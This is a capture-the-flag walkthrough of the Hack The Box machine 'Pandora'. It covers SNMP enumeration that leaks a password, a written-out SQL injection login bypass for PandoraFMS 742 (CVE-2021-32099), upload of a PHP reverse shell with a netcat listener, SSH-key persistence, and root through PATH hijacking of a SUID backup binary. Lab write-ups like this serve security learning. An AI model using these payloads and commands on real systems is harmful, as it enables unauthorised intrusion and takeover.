Pandora
Enumeration
Nmap
First, let's scan for open ports using nmap. We can quickly scan for open ports and store them in a variable: ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.136 | grep "^[0-9]" | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//). Then, we can scan those specific ports in depth by running nmap's built-in scripts: nmap -p$ports -sC -sV 10.10.11.136.
Scan for UDP services with sudo nmap -p- -sU -r -T5 10.10.11.136 -v (-r specifies that ports will be scanned sequentially instead of randomly. we do this because services are more likely to be running on ports 1-1000.):
So, port 161/udp is open.
Apache (Port 80)
80)Let's brute force directories with ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.136/FUZZ:
This doesn't find anything useful. Using the larger /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt wordlist also doesn't find anything useful.
The site mentions panda.htb, so we'll add that to our /etc/hosts file with echo "10.10.11.136 panda.htb" | sudo tee -a /etc/hosts. Trying to find other possible virtual hosts with ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://panda.htb -H "Host: FUZZ.panda.htb" -fl 908 for both panda.htb and pandora.htb does not yield any results.
SNMP (UDP Port 161)
161)Let's scan port 161/udp individually with nmap by running sudo nmap -p161 -sU -T5 -sC -sV 10.10.11.136 > nmap_port161udp_scan.txt: nmap_port161udp_scan.txt. This scan is quite large, which is why we pipe it into a file.
Learning about SNMP
The scan shows that we're dealing with Simple Network Management Protocol (SNMP), which "is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...)" (quote from HackTricks). According to HackTricks, "MIB stands for Management Information Base and is a collection of information organized hierarchically. These are accessed using a protocol such as SNMP... OIDs stands for Object Identifiers. OIDs uniquely identify managed objects in a MIB hierarchy." You can read the HackTricks page on SNMP for more information.
In order to access the information saved on the MIB, we need to know the community string in version 1 of SNMP. This acts as a sort of password but it is sent in plain text. By default, SNMP's read only functions use the community string public.
To enumerate SNMP, we’ll use snmpwalk. snmpwalk attempts to walk through all of the available MIBs and retrieve the information. "Before running our snmpwalk command, we should install snmp-mibs-downloader. This package will install all of the MIB files that aren’t included by default due to licensing issues" (quote from epi052.gitlab.io). We will run sudo apt-get install snmp-mibs-downloader; sudo download-mibs to get the MIB files.
According to i052.gitlab.io, "after installing the package, we need to comment out the mibs : line in /etc/snmp/snmp.conf. Doing this configures snmp to use the freshly downloaded MIBs."
Finally, we can enumerate SNMP with snmpwalk -Os -c public -v 1 10.10.11.136. This will output a lot of data, so redirecting to a file is recommended: complete_snmpwalk_output.txt.
Foothold
Anyway, the piece of information we are looking for is contained in both the snmpwalk output and the nmap output because we used -sC to run scripts (specifically the snmp-processes nmap script was run). Looking at process id 855 in either script's output shows /bin/sh being ran withe parameters -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23':
Running ssh daniel@pandora.htb and using HotelBabylon23 as the password to login works.
Running cat /etc/passwd shows that the user with id 1000 is matt. The user.txt flag is in matt's home folder, which we can see by running ls /home/matt.
Lateral Movement
We login over SSH to the daniel user with pwncat by running pwncat-cs daniel@pandora.htb.
Let's check out the process that was being run that gave us the login information. Running the same command /usr/bin/host_check -u daniel -p HotelBabylon23 produces:
cat ~/.host_check:
Looks like there is a service running on localhost.localdomain. Let's see what it is with curl localhost.localdomain, which shows <meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">. Running curl localhost.localdomain/pandora_console/ displays a whole website. Running (netstat -punta || ss --ntpu) | grep "127.0" to list open local ports doesn't show anything out of the ordinary so this web sever must be running as a different user:
So, let's check out /var/www/ since we know this machine is using Apache due to our first nmap scan. There are two folders in /var/www/: html, which contains the original website we accessed on port 80, and pandora, which contains the new site we found running locally.
Listing the contents of this directory with ls -la pandora_console/ shows a lot of files owned by matt
So, the new web server is running under matt's user so this is almost certainly our lateral movement vector.
Running cat /etc/apache2/sites-enabled/pandora.conf to look at the Apache confiuration for this site shows that it is indeed running under the matt user:
This file also lets us know that it is running locally on port 80. So, let's forward that to our attack machine with ssh -L 8080:localhost:80 daniel@pandora.htb. Now, navigating to http://localhost:8080/pandora_console/ brings us to a login page.
Trying to authenticate using the only set of credentials we have daniel:HotelBabylon23 results in a message appearing that says "User only can use the API."
It looks like PandoraFMS is a legit product. Searching for the version string at the bottom of the page finds CVE-2020-5844, but it looks like this requires us to be an "authenticated administrator," which we are not. We also find the metasploit module pandora_fms_events_exec. However, " Valid credentials for a Pandora FMS account are required."
Searching for "pandora fms 742 exploit" finds Pandora FMS 742: Critical Code Vulnerabilities Explained, which mentions a SQL Injection pre authentication exploit (CVE-2021-32099): "Our focus is on a severe SQL injection vulnerability. It can be remotely exploited without any access privileges and enables an attacker to completely bypass the administrator authentication. This enables in the end to execute arbitrary code on the system." CVE-2021-32099 is "a SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session via the /include/chart_generator.php session_id parameter, leading to a login bypass."
Searching for CVE-2021-32099 finds ibnuuby/CVE-2021-32099, which contains a proof of concept:
We can change the port from the proof of concept from 8000 to 8080 since that is what we are using. Now, going to http://localhost:8080/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271 in your browser and then navigating back to http://localhost:8080/pandora_console/ will log you into PandoraFMS as an administrator. A video of this happening can be seen on the blog post linked from the repo: Pandora FMS 742: Critical Code Vulnerabilities Explained.
Clicking on admin in the top right brings you to a page where you can edit your user's details. I changed the password to admin and then clicked "Update" at the bottom.
Now that we have the credentials to an account, let's try some of the previous exploits we found. For metasploit, run the following:
This exploit fails. The exploit linux/http/pandora_ping_cmd_exec also fails even after I created a new user in the interface. This exploit-db script fails as well. Also, TheCyberGeek/CVE-2020-5844 fails too. TheCyberGeek's script probably is supposed to work since he is one of the creators of this box. Additionally, after solving the box, I found this repo: shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated. So, this exploit might also work.
Since we are an administrator we can upload files by going to Admin tools > File manager on the left. So, lets get a PHP reverse shell with wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php, edit in our ip address and port, start a listener with nc -nvlp 28600 and then go to http://localhost:8080/pandora_console/images/php-reverse-shell.php on the server to get a reverse shell. This is successful!
We can get persistance with run implant.authorized_key key=/home/kali/.ssh/id_rsa in pwncat. I set the permissions of the .ssh folder to be what they should be with chmod 700 .ssh && chmod 600 .ssh/authorized_keys.
We can finally run cat /home/matt/user.txt to get the user.txt flag.
Privilege Escalation
First, we connect with pwncat-cs matt@pandora.htb --identity /home/kali/.ssh/id_rsa for a stable shell. I use pwncat and upload LinPEAS with upload linpeas.sh then run it with bash linpeas.sh.
In the LinPEAS output we see:
Running ls -la /usr/bin/pandora_backup shows that this is a SUID binary. Running the actual /usr/bin/pandora_backup script appears to create a tar archive of the /var/www/pandora/pandora_console/ directory.
We can run download /usr/bin/pandora_backup to download it to our local machine with pwncat since the target machine does not have the strings command.
Running strings pandora_backup shows tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/* in the output. So, it looks like it is just running the tar binary from a relative path. We can create a new file called tar in our home directory that simply runs /bin/bash with mkdir ~/bin; echo "/bin/bash" > ~/bin/tar. Set the new "tar" file to executable with chmod +x ~/bin/tar. Now, we can add that to our path ahead of any other directory with export PATH=/home/matt/bin:$PATH. Now, we can run the SUID binary again: /usr/bin/pandora_backup.
Finally, we run cat /root/root.txt to get the root.txt flag.
We can get persistance as root with run implant.authorized_key key=/home/kali/.ssh/id_rsa in pwncat.
Last updated